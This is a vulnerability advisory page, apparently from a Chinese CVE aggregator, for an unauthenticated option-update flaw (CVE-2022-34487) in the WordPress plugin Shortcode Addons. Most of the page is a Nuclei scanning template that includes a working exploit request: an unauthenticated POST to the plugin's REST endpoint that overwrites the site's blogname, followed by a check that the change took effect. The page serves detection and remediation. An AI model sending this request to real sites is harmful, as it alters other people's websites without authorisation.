CVE-2022-34487: ShortCode Addons - Unauthenticated Options Update

日期: 2025-12-02 | 影响软件: ShortCode Addons | POC: 已公开

漏洞描述

WordPress plugin Shortcode Addons <= 3.0.2 contains an unauthenticated arbitrary option update caused by insufficient access controls in the plugin, letting attackers modify options without authentication.

PoC代码[已公开]

id: CVE-2022-34487

info:
  name: ShortCode Addons - Unauthenticated Options Update
  author: Sourabh-Sahu
  severity: critical
  description: |
    WordPress plugin Shortcode Addons <= 3.0.2 contains an unauthenticated arbitrary option update caused by insufficient access controls in the plugin, letting attackers modify options without authentication.
  impact: |
    Attackers can modify plugin options arbitrarily, potentially leading to site defacement, data tampering, or further exploitation.
  remediation: |
    Update to the latest version of Shortcode Addons plugin.
  reference:
    - https://wpscan.com/vulnerability/c8dd91d5-fdc4-4852-9823-6d0047b214fe/
    - https://patchstack.com/database/vulnerability/shortcode-addons/wordpress-shortcode-addons-plugin-3-0-3-unauthenticated-arbitrary-option-update-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34487
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-34487
    cwe-id: CWE-264
    epss-score: 0.48857
    epss-percentile: 0.97634
    cpe: cpe:2.3:a:oxilab:shortcode_addons:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2022,wp,wp-plugin,wordpress,shortcode-addons,vkev

flow: http(1) && http(2)

variables:
  rand: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-json/ShortCodeAddonsUltimate/v2/addons_settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22{{rand}}%22%7D

    matchers:
      - type: dsl
        internal: true
        dsl:
          - status_code == 200
          - contains(body, 'oxi-confirmation-success')
        condition: and

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, rand, "/wp-")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100fd76cfa41233f5cbbc388bee04a17cd57e37f5690dffc1d3fb2ef79f18f2cf31022100c0c81d400bade1947ddedf962beb582a6f5d3c294937752e013a4c5157a51c04:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-34487.yaml

相关漏洞推荐